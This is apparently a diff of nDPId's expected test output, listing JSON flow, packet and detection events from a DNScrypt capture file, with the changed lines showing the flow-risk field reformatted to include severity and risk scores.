-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":55896,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":55896,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":48448,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":946739312286,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAAXcaDMgAL0RTlkKAAABQlUec71AAbsGBPfPLCkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":48448,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":48448,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":254,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAABQaDMAub0RcywKAAABQlUecwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":254,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":40099,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":946739312286,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAAIcaDRAAL0RMhgKAAABQlUec5yjAbsCCCOeLCoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":40099,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":40099,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":47432,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":946739312286,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAAXcaDUgAL0RTlcKAAABQlUec7lIAbsGBPvFLCsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":47432,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":47432,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":257,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAABQaDUAub0RcyoKAAABQlUecwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":257,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":54112,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":946739312286,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAAIcaDZAAL0RMhYKAAABQlUec9NgAbsCCCOeLCgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":54112,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":54112,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":35634,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":946739312286,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAAXcaDcgAL0RTlUKAAABQlUec4syAbsGBCngLCcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
